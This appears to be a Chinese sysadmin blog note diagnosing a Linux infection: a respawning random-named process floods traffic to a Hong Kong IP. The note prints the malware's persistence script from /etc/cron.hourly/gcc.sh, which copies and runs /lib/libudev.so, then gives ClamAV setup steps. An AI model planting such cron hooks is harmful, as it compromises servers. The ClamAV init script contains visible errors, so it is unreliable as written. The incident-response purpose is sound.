网络流量暴满,疯狂地向香港的一个IP发数据,同时在top里面表现为随机的10位字母的进程,看/proc里面的信息,则为ls,cd之类常见的命令,CPU利用率也在top之首。杀死该进程后,会再随机产生一个新的进程
在crontab的log里面,总显示执行了一个gcc.sh,经查找,是在/etc/cron.hourly/里面:
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
安装clamav杀病毒 软件
cd /tmp
http://apt.sw.be/redhat/el5/en/x86_64/rpmforge/RPMS/clamd-0.96.2-2.el5.rf.x86_64.rpm
http://apt.sw.be/redhat/el5/en/x86_64/rpmforge/RPMS/clamav-db-0.96.2-2.el5.rf.x86_64.rpm
http://apt.sw.be/redhat/el5/en/x86_64/rpmforge/RPMS/clamav-0.96.2-2.el5.rf.x86_64.rpm
http://apt.sw.be/redhat/el5/en/x86_64/rpmforge/RPMS/clamav-milter-0.96.2-2.el5.rf.x86_64.rpm
http://apt.sw.be/redhat/el5/en/x86_64/rpmforge/RPMS/clamav-devel-0.96.2-2.el5.rf.x86_64.rpm
安装
rpm -ivh clamav-db-0.96.2-2.el5.rf.x86_64.rpm
rpm -ivh clamav-0.96.2-2.el5.rf.x86_64.rpm
rpm -ivh clamav-milter-0.96.2-2.el5.rf.x86_64.rpm
rpm -ivh clamav-devel-0.96.2-2.el5.rf.x86_64.rpm
rpm -ivh clamd-0.96.2-2.el5.rf.x86_64.rpm
#设定clamd.conf
# vi /etc/clamd.conf
========================================================
#Example 注释掉Example行
LogFile /var/log/clamav/clamd.log
LogVerbose
LogTime
LocalSocket /tmp/clamav.socket
PidFile /var/run/clamd.pid
DatabaseDirectory /usr/share/clamav
MaxDirectoryRecursion 15
ScanMail
ScanArchive
========================================================
#启动 clamd 程序
# /usr/sbin/clamd
#设定freshclam.conf
编辑/etc/freshclam.conf
# vi /etc/freshclam.conf
========================================================
#Example 注释掉Example行
DatabaseDirectory /usr/share/clamav
UpdateLogFile /var/log/clamav/freshclam.log
LogSyslog
LogVerbose
DatabaseMirror db.CN.clamav.net
DatabaseMirror database.clamav.net
HTTPProxyServer X.X.X.X
HTTPProxyPort 3128
========================================================
# 执行 Clamavs病毒库升级
# /usr/bin/freshclam
建立clamd的启动脚本:
# vi /etc/init.d/clamd
========================================================
#! /bin/bash
#
# crond Start/Stop the clam antivirus daemon.
#
# chkconfig: 2345 90 60
# description: clamdis a standard UNIX program that scans for Viruses.
# processname: clamd
# config: /etc/clamd.conf
# pidfile: /var/run/clamav/clamd.pid
# Source function library.
. /etc/init.d/functions
RETVAL=0
# See how we were called.
prog="clamd"
progdir="/usr/sbin"
# Source configuration
if [ -f /etc/sysconfig/$prog ] ; then
. /etc/sysconfig/$prog
fi
start() {
echo -n $"Starting $prog: "
daemon $progdir/$prog
RETVAL=$?
echo
[ $RETVAL -eq 0 ] && touch /var/run/clamav/clamd.pid
return $RETVAL
}
stop() {
echo -n $"Stopping $prog: "
killproc $prog
RETVAL=$?
echo
[ $RETVAL -eq 0 ] && rm -f /var/run/clamav/clamd.pid
return $RETVAL
}
status() {
status clamd
}
restart() {
stop
start
}
reload() {
echo -n $"Reloading clam daemon configuration: "
killproc clamd -HUP
retval=$?
echo
return $RETVAL
}
case "$1" in
start)
start
;;
stop)
stop
;;
restart)
restart
;;
reload)
reload
;;
status)
rhstatus
;;
restart)
[ -f /var/lock/subsys/clamd ] && restart || :
;;
*)
echo $"Usage: $0 {start|stop|status|reload|restart|condrestart}"
exit 1
esac
exit 0
========================================================
#设置 clamav 为自启动项
# chmod 755 /etc/init.d/clamd
# /sbin/chkconfig --add clamd
# /sbin/chkconfig clamd on
# clamscan -r test 对 test 文件夹进行病毒扫描
